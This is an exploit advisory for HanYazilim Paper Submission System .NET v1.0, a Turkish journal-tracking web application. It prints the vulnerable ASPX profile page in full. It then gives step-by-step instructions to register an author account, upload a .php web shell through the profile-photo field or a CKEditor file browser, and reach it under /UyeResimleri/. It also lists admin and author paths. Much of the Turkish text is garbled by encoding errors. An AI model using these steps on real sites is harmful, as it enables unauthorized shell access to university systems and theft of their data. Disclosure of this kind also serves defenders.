#################################################################################
# Exploit Title : HanYazilim Paper Submission System .NET v1.0 Privilege
Escalation / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/02/2019
# Vendor Homepage : hanyazilim.com
# Software Information Link : hanyazilim.com/hakemlimakaletakipsistemi.pdf
videolar.hanyazilim.com
# CKEditor Simogeo Download :
github.com/simogeo/ckeditor-adv_link/archive/master.zip
# Software Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types :
CWE-266: Incorrect Privilege Assignment
CWE-269: Improper Privilege Management
CWE-284: Improper Access Control
CWE-250: Execution with Unnecessary Privileges
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
#################################################################################
# Description about Software :
***************************
HanYazilim Makale Takip Sistemi .NET v1.0 is a kind of Turkish Software
that can be tracked articles
and the journals is used for Turkish University Faculties.
#################################################################################
# Impact and Consequences :
****************************
* This Software [ Product ] HanYazilim Makale Takip Sistemi .NET v1.0
incorrectly assigns
a privilege to a particular actor, creating an unintended sphere of
control for that actor.
* The software does not restrict or incorrectly restricts access to a
resource from an unauthorized actor.
* The software performs an operation at a privilege level that is higher
than the minimum
level required, which creates new weaknesses or amplifies the consequences
of other weaknesses.
* The software does not properly assign, modify, track, or check privileges
for an actor, creating an unintended sphere of control for that actor.
#################################################################################
# Vulnerable Source Code : [ uyelikbilgilerim.aspx ]
*********************************************
<%@ Page Language="C#" MasterPageFile="~/Uye.master" AutoEventWireup="true"
CodeFile="UyelikBilgilerim.aspx.cs" Inherits="UyelikBilgilerim"
Title="Untitled Page" culture="auto" meta:resourcekey="PageResource1"
uiculture="auto" %>
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
<style type="text/css">
.style1
{
width: 801px;
height: 70px;
}
.style7
{
width: 135px;
}
.style351
{
color: #FF0000;
}
.style357
{
width: 135px;
height: 28px;
}
.style358
{
width: 1200px;
height: 28px;
}
</style>
<link href="images/mainstyle.css" rel="stylesheet" type="text/css" />
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1"
Runat="Server">
<table class="tablosayfaadi">
<tr>
<td class="tablosayfayazi">
<asp:Label ID="Label1" runat="server" Text="Uye Detay/Member
Details"
meta:resourcekey="Label1Resource1"></asp:Label></td>
</tr>
</table>
<table class="style1">
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:Label ID="Label4" runat="server" CssClass="style351"
Text="Label"
Visible="False"
meta:resourcekey="Label4Resource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label2" runat="server" Text="AdA+- SoyadA+-"
meta:resourcekey="Label2Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox1" runat="server" Width="290px"
meta:resourcekey="TextBox1Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator1"
runat="server"
ControlToValidate="TextBox1" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator1Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label5" runat="server" Text="Unvan /Title"
meta:resourcekey="Label5Resource1"></asp:Label></td>
<td class="style8">
<asp:DropDownList ID="DropDownList2" runat="server"
meta:resourcekey="DropDownList2Resource1">
<asp:ListItem Value="1"
meta:resourcekey="ListItemResource1">AraAtA+-rma GAPrevlisi</asp:ListItem>
<asp:ListItem Value="2"
meta:resourcekey="ListItemResource2">Doktor</asp:ListItem>
<asp:ListItem Value="3"
meta:resourcekey="ListItemResource3">Yrd.DoASSent</asp:ListItem>
<asp:ListItem Value="4"
meta:resourcekey="ListItemResource4">DoASS. Dr.</asp:ListItem>
<asp:ListItem Value="5"
meta:resourcekey="ListItemResource5">Prof. Dr.</asp:ListItem>
<asp:ListItem Value="6"
meta:resourcekey="ListItemResource6">DiAer</asp:ListItem>
</asp:DropDownList>
<asp:RequiredFieldValidator ID="RequiredFieldValidator10"
runat="server"
ControlToValidate="DropDownList2" ErrorMessage="*"
InitialValue="0"
meta:resourcekey="RequiredFieldValidator10Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label6" runat="server"
Text="E-Posta /Email"
meta:resourcekey="Label6Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox3" runat="server" Width="290px"
ReadOnly="True"
meta:resourcekey="TextBox3Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator3"
runat="server"
ControlToValidate="TextBox3" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator3Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style357">
<asp:Label ID="Label7" runat="server"
Text="Parola /Password"
meta:resourcekey="Label7Resource1"></asp:Label>
</td>
<td class="style358">
<asp:TextBox ID="TextBox4" runat="server" Width="290px"
meta:resourcekey="TextBox4Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator4"
runat="server"
ControlToValidate="TextBox4" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator4Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label8" runat="server"
Text="AdegA Telefonu /Office Telephone"
meta:resourcekey="Label8Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox5" runat="server" Width="290px"
meta:resourcekey="TextBox5Resource1"></asp:TextBox>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label9" runat="server"
Text="Cep Telefonu /GSM"
meta:resourcekey="Label9Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox6" runat="server" Width="290px"
meta:resourcekey="TextBox6Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator12"
runat="server"
ControlToValidate="TextBox6" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator12Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label10" runat="server"
Text="Adresi /Address"
meta:resourcekey="Label10Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox7" runat="server" Width="290px"
meta:resourcekey="TextBox7Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator9"
runat="server"
ControlToValidate="TextBox7" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator9Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label11" runat="server"
Text="Kurumu /Institution"
meta:resourcekey="Label11Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="TextBox8" runat="server" Width="290px"
meta:resourcekey="TextBox8Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator6"
runat="server"
ControlToValidate="TextBox8" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator6Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label12" runat="server"
Text="GAPrevi /Task"
meta:resourcekey="Label12Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="Gorevi" runat="server" Width="290px"
meta:resourcekey="GoreviResource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator13"
runat="server"
ControlToValidate="Gorevi" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator13Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label13" runat="server"
Text="AlanA+- /Field"
meta:resourcekey="Label13Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="Alani" runat="server" Width="290px"
meta:resourcekey="AlaniResource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator7"
runat="server"
ControlToValidate="Alani" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator7Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label14" runat="server"
Text="KA+-sa AzgeASSmiA /Short Biography"
meta:resourcekey="Label14Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="TextBox10" runat="server" Height="69px"
TextMode="MultiLine"
Width="290px"
meta:resourcekey="TextBox10Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator8"
runat="server"
ControlToValidate="TextBox10" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator8Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label15" runat="server"
Text="Profil FotografA+- /Profile Photo"
meta:resourcekey="Label15Resource1"></asp:Label>
</td>
<td class="style6" valign="middle">
<asp:Image ID="Image1" runat="server" Height="75px"
Width="75px"
meta:resourcekey="Image1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:CheckBox ID="CheckBox2" runat="server"
AutoPostBack="True"
oncheckedchanged="CheckBox2_CheckedChanged"
Text="Ayelik Resmini DeAiAtir /Change Profile Photo"
meta:resourcekey="CheckBox2Resource1" />
<asp:FileUpload ID="FileUpload1" runat="server"
Visible="False"
meta:resourcekey="FileUpload1Resource1" />
<asp:RequiredFieldValidator ID="RequiredFieldValidator11"
runat="server"
ControlToValidate="FileUpload1" ErrorMessage="*"
Visible="False"
meta:resourcekey="RequiredFieldValidator11Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label16" runat="server"
Text="Ayelik Tipi /Membership Type"
meta:resourcekey="Label16Resource1"></asp:Label>
</td>
<td class="style6">
<asp:DropDownList ID="DropDownList1" runat="server"
meta:resourcekey="DropDownList1Resource1">
<asp:ListItem Value="1"
meta:resourcekey="ListItemResource7">Yazar</asp:ListItem>
<asp:ListItem Value="2"
meta:resourcekey="ListItemResource8">Hakem</asp:ListItem>
<asp:ListItem Value="3"
meta:resourcekey="ListItemResource9">EditAPr</asp:ListItem>
</asp:DropDownList>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label17" runat="server" Text="Ayelik Durumu
/Membership Status"
meta:resourcekey="Label17Resource1"></asp:Label></td>
<td class="style6">
<asp:CheckBox ID="CheckBox1" runat="server"
meta:resourcekey="CheckBox1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label18" runat="server" Text="GA1/4venlik
Kodu"
meta:resourcekey="Label18Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="TextBox11" runat="server"
meta:resourcekey="TextBox11Resource1"></asp:TextBox>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<img src="GuvenlikKodu.aspx"> <asp:Label
ID="lblDusunceler" runat="server"
Visible="False"
meta:resourcekey="lblDusuncelerResource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:Button ID="Button1" runat="server" Text="DeAiAtir
/Change" Height="26px"
onclick="Button1_Click1"
meta:resourcekey="Button1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:Label ID="Label3" runat="server" Text="Label"
Visible="False"
meta:resourcekey="Label3Resource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
</td>
</tr>
</table>
<table class="tablosayfaadi">
<tr>
<td class="tablosayfayazi">
</td>
</tr>
</table>
</asp:Content>
#################################################################################
# Privelege Escalation Exploit :
***************************
# Usage :
*********
# Register yourself as Author => [ Yazar ] account. [ New Admin ]
# Registeration with random e-mail address and choose Professor Doctor.
# Put password for your account.
# Fill All the Blanks. Enter Captchas.
/YeniUyelik.aspx
# After Successfull Registeration => it says =>
Your registration has been completed successfully.
Now you can login to the web site with your username and password..
# Admin Panel Login Path :
************************
/Hata.aspx?Mesaj=3
# Usable Author Control Links :
****************************
/UyeTumMakaleler.aspx?Mesaj=2
/UyeTumMakaleler.aspx?Goster=0
/UyeYayinlanacaklarDefault.aspx?Goster=4
/Arama.aspx
/MakaleGonder.aspx
/Mesajlar.aspx
/GonderilenMesajlar.aspx
/MesajGonder.aspx
Exploitation =>
**************
/ckeditor/plugins/simogeo/Browser.aspx
/UyelikBilgilerim.aspx
It says in Turkish Language :
Ayelik Resmini DeAiAtir. [ Change your Membership picture ]
Choose your .php file to upload from My Profile Photo.
Shell Uploaded Successfully.
Directory File Path :
******************
/UyeResimleri/[RANDOM-NUMBER]_[yourshellnamehere].php
#################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
Polish
English